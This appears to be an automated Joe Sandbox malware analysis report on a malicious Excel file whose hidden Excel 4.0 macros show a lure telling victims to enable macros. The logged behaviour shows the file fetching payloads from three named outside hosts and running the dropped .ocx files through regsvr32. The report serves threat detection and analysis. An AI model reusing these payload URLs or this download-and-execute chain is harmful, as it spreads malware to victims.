Loading ...

Play interactive tourEdit tour

Windows Analysis Report survey-1378794827.xls

Overview

General Information

Sample Name:survey-1378794827.xls
Analysis ID:528581
MD5:7858cdbf85a5751a0853620c8908df14
SHA1:8200d0104d40b68f9e523a1331dd77a8d36a827f
SHA256:37ec1209daa15ba2bb2a9d9c372960703125e0b0acfa0736cb2ae10edfad7d62
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Yara signature match
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Document contains embedded VBA macros
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1256 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 2788 cmdline: "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1452 cmdline: "C:\Windows\System32\regsvr32.exe" C:\Datop\bestb.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1188 cmdline: "C:\Windows\System32\regsvr32.exe" C:\Datop\bestc.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
survey-1378794827.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x3b2aa:$s1: Excel
  • 0x3c378:$s1: Excel
  • 0x3521:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
survey-1378794827.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Desktop\survey-1378794827.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
    • 0x0:$header_docf: D0 CF 11 E0
    • 0x3b2aa:$s1: Excel
    • 0x3c378:$s1: Excel
    • 0x3521:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
    C:\Users\user\Desktop\survey-1378794827.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx, CommandLine: "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1256, ProcessCommandLine: "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx, ProcessId: 2788

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: unknownHTTPS traffic detected: 192.185.79.2:443 -> 192.168.2.22:49165 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 192.185.129.7:443 -> 192.168.2.22:49166 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 103.247.11.218:443 -> 192.168.2.22:49167 version: TLS 1.2

      Software Vulnerabilities:

      barindex
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
      Document exploit detected (UrlDownloadToFile)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.185.79.2:443
      Source: global trafficDNS query: name: klevvrtech.com
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.185.79.2:443
      Source: global trafficHTTP traffic detected: GET /zxywJAC24KJ/ji.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: klevvrtech.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /OYcMRJbL/ji.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: srkcampus.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /fbmKk6n48G/ji.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: rstebet.co.idConnection: Keep-Alive
      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
      Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
      Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
      Source: regsvr32.exe, 00000003.00000002.446628445.00000000049A0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.460419684.0000000004920000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
      Source: regsvr32.exe, 00000003.00000002.446628445.00000000049A0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.460419684.0000000004920000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
      Source: regsvr32.exe, 00000003.00000002.446628445.00000000049A0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.460419684.0000000004920000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
      Source: regsvr32.exe, 00000003.00000002.446792904.0000000004B87000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.460700581.0000000004B07000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.439821298.0000000004A97000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
      Source: regsvr32.exe, 00000003.00000002.446792904.0000000004B87000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.460700581.0000000004B07000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.439821298.0000000004A97000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: regsvr32.exe, 00000003.00000002.446194277.0000000003A70000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.459908784.0000000003990000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: regsvr32.exe, 00000003.00000002.444152722.0000000001CA0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.459305635.0000000001C80000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.438784192.0000000001D00000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
      Source: regsvr32.exe, 00000003.00000002.446792904.0000000004B87000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.460700581.0000000004B07000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.439821298.0000000004A97000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: regsvr32.exe, 00000003.00000002.446792904.0000000004B87000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.460700581.0000000004B07000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.439821298.0000000004A97000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: regsvr32.exe, 00000003.00000002.446194277.0000000003A70000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.459908784.0000000003990000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
      Source: regsvr32.exe, 00000003.00000002.446628445.00000000049A0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.460419684.0000000004920000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
      Source: regsvr32.exe, 00000003.00000002.446792904.0000000004B87000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.460700581.0000000004B07000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.439821298.0000000004A97000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
      Source: regsvr32.exe, 00000003.00000002.446628445.00000000049A0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.460419684.0000000004920000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
      Source: regsvr32.exe, 00000004.00000002.460419684.0000000004920000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ji[1].htmJump to behavior
      Source: unknownDNS traffic detected: queries for: klevvrtech.com
      Source: global trafficHTTP traffic detected: GET /zxywJAC24KJ/ji.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: klevvrtech.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /OYcMRJbL/ji.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: srkcampus.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /fbmKk6n48G/ji.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: rstebet.co.idConnection: Keep-Alive
      Source: unknownHTTPS traffic detected: 192.185.79.2:443 -> 192.168.2.22:49165 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 192.185.129.7:443 -> 192.168.2.22:49166 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 103.247.11.218:443 -> 192.168.2.22:49167 version: TLS 1.2

      System Summary:

      barindex
      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
      Source: Screenshot number: 4Screenshot OCR: Enable Editing 18 '9 41' I 20 (D PROTECTED VIEW Be careful- files from the 1nterne cted View.
      Source: Screenshot number: 4Screenshot OCR: Enable Content 25 26 G) SECURITY WARNING Macros have been disabled. Enable Content 27 28 29 30
      Source: Screenshot number: 8Screenshot OCR: Enable Editing ., le, No RETURNQ or HALTQ function found on maao sheet. 18 19 I ' : 20 (D PROTE
      Source: Screenshot number: 8Screenshot OCR: Enable Content 25 26 G) SECURITY WARNING Macros have been disabled. Enable Content 27 28 29 30
      Source: Document image extraction number: 0Screenshot OCR: Enable Editing 0 PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless yo
      Source: Document image extraction number: 0Screenshot OCR: Enable Content OSECURITY WARNING Macros have been disabled. Enable Content om If you are using a m
      Source: Document image extraction number: 1Screenshot OCR: Enable Editing (D PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless y
      Source: Document image extraction number: 1Screenshot OCR: Enable Content OSECURITY WARNING Macros have been disabled. Enable Content om If you are using a m
      Source: Screenshot number: 12Screenshot OCR: Enable Editing d 18 19 20 (D PROTECTED VIEW Be careful - files from the Internet can contain viru
      Source: Screenshot number: 12Screenshot OCR: Enable Content 25 26 G) SECURITY WARNING Macros have been disabled. Enable Content 27 28 29 30
      Source: survey-1378794827.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
      Source: C:\Users\user\Desktop\survey-1378794827.xls, type: DROPPEDMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
      Source: survey-1378794827.xlsMacro extractor: Sheet name: Buk1
      Source: survey-1378794827.xlsMacro extractor: Sheet name: Buk4
      Source: survey-1378794827.xlsMacro extractor: Sheet name: Buk6
      Source: survey-1378794827.xlsMacro extractor: Sheet name: Buk7
      Source: survey-1378794827.xlsMacro extractor: Sheet name: Buk2
      Source: survey-1378794827.xlsMacro extractor: Sheet name: Buk3
      Source: survey-1378794827.xlsOLE indicator, VBA macros: true
      Source: survey-1378794827.xls.0.drOLE indicator, VBA macros: true
      Source: A5B1.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: survey-1378794827.xlsOLE indicator, Workbook stream: true
      Source: survey-1378794827.xls.0.drOLE indicator, Workbook stream: true
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\bestb.ocx
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\bestc.ocx
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocxJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\bestb.ocxJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\bestc.ocxJump to behavior
      Source: regsvr32.exe, 00000003.00000002.446628445.00000000049A0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.460419684.0000000004920000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVREB38.tmpJump to behavior
      Source: classification engineClassification label: mal64.expl.winXLS@7/4@3/3
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
      Source: C:\Windows\System32\regsvr32.exeAutomated click: OK
      Source: C:\Windows\System32\regsvr32.exeAutomated click: OK
      Source: C:\Windows\System32\regsvr32.exeAutomated click: OK
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: A5B1.tmp.0.drInitial sample: OLE indicators vbamacros = False
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\regsvr32.exe TID: 1292Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\System32\regsvr32.exe TID: 668Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\System32\regsvr32.exe TID: 2364Thread sleep time: -60000s >= -30000sJump to behavior

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      Yara detected hidden Macro 4.0 in ExcelShow sources
      Source: Yara matchFile source: survey-1378794827.xls, type: SAMPLE
      Source: Yara matchFile source: C:\Users\user\Desktop\survey-1378794827.xls, type: DROPPED

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsScripting1Path InterceptionProcess Injection1Disable or Modify Tools1OS Credential DumpingVirtualization/Sandbox Evasion1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol13Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer2SIM Card SwapCarrier Billing Fraud

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      No Antivirus matches

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      https://klevvrtech.com/zxywJAC24KJ/ji.html0%Avira URL Cloudsafe
      http://www.%s.comPA0%URL Reputationsafe
      https://srkcampus.org/OYcMRJbL/ji.html0%Avira URL Cloudsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://servername/isapibackend.dll0%Avira URL Cloudsafe
      https://rstebet.co.id/fbmKk6n48G/ji.html0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      klevvrtech.com
      192.185.79.2
      truefalse
        unknown
        rstebet.co.id
        103.247.11.218
        truefalse
          unknown
          srkcampus.org
          192.185.129.7
          truefalse
            unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://klevvrtech.com/zxywJAC24KJ/ji.htmlfalse
            • Avira URL Cloud: safe
            unknown
            https://srkcampus.org/OYcMRJbL/ji.htmlfalse
            • Avira URL Cloud: safe
            unknown
            https://rstebet.co.id/fbmKk6n48G/ji.htmlfalse
            • Avira URL Cloud: safe
            unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkregsvr32.exe, 00000003.00000002.446792904.0000000004B87000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.460700581.0000000004B07000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.439821298.0000000004A97000.00000002.00020000.sdmpfalse
              high
              http://www.windows.com/pctv.regsvr32.exe, 00000004.00000002.460419684.0000000004920000.00000002.00020000.sdmpfalse
                high
                http://investor.msn.comregsvr32.exe, 00000003.00000002.446628445.00000000049A0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.460419684.0000000004920000.00000002.00020000.sdmpfalse
                  high
                  http://www.msnbc.com/news/ticker.txtregsvr32.exe, 00000003.00000002.446628445.00000000049A0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.460419684.0000000004920000.00000002.00020000.sdmpfalse
                    high
                    http://www.icra.org/vocabulary/.regsvr32.exe, 00000003.00000002.446792904.0000000004B87000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.460700581.0000000004B07000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.439821298.0000000004A97000.00000002.00020000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.regsvr32.exe, 00000003.00000002.446194277.0000000003A70000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.459908784.0000000003990000.00000002.00020000.sdmpfalse
                      high
                      http://investor.msn.com/regsvr32.exe, 00000003.00000002.446628445.00000000049A0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.460419684.0000000004920000.00000002.00020000.sdmpfalse
                        high
                        http://www.%s.comPAregsvr32.exe, 00000003.00000002.446194277.0000000003A70000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.459908784.0000000003990000.00000002.00020000.sdmpfalse
                        • URL Reputation: safe
                        low
                        http://windowsmedia.com/redir/services.asp?WMPFriendly=trueregsvr32.exe, 00000003.00000002.446792904.0000000004B87000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.460700581.0000000004B07000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.439821298.0000000004A97000.00000002.00020000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.hotmail.com/oeregsvr32.exe, 00000003.00000002.446628445.00000000049A0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.460419684.0000000004920000.00000002.00020000.sdmpfalse
                          high
                          http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.444152722.0000000001CA0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.459305635.0000000001C80000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.438784192.0000000001D00000.00000002.00020000.sdmpfalse
                          • Avira URL Cloud: safe
                          low

                          Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public

                          IPDomainCountryFlagASNASN NameMalicious
                          192.185.129.7
                          srkcampus.orgUnited States
                          46606UNIFIEDLAYER-AS-1USfalse
                          192.185.79.2
                          klevvrtech.comUnited States
                          46606UNIFIEDLAYER-AS-1USfalse
                          103.247.11.218
                          rstebet.co.idIndonesia
                          58487RUMAHWEB-AS-IDRumahwebIndonesiaCVIDfalse

                          General Information

                          Joe Sandbox Version:34.0.0 Boulder Opal
                          Analysis ID:528581
                          Start date:25.11.2021
                          Start time:14:25:46
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 6m 43s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Sample file name:survey-1378794827.xls
                          Cookbook file name:defaultwindowsofficecookbook.jbs
                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                          Number of analysed new started processes analysed:7
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal64.expl.winXLS@7/4@3/3
                          EGA Information:Failed
                          HDC Information:Failed
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          • Found application associated with file extension: .xls
                          • Found Word or Excel or PowerPoint or XPS Viewer
                          • Attach to Office via COM
                          • Scroll down
                          • Close Viewer
                          Warnings:
                          Show All
                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/528581/sample/survey-1378794827.xls

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          14:26:31API Interceptor143x Sleep call for process: regsvr32.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          192.185.129.7doc-904268081.xlsGet hashmaliciousBrowse
                            doc-904268081.xlsGet hashmaliciousBrowse
                              http://ibaylor.psatrans.com/cmlja3lfc293ZWxsQGJheWxvci5lZHU=Get hashmaliciousBrowse
                                https://digitek.global/cinetraGet hashmaliciousBrowse

                                  Domains

                                  No context

                                  ASN

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  UNIFIEDLAYER-AS-1USQUOTATION REQUEST DOCUMENTS - GOTO TRADING.exeGet hashmaliciousBrowse
                                  • 162.240.9.164
                                  SecuriteInfo.com.VHO.Trojan-PSW.MSIL.Stealer.gen.30557.exeGet hashmaliciousBrowse
                                  • 192.185.84.191
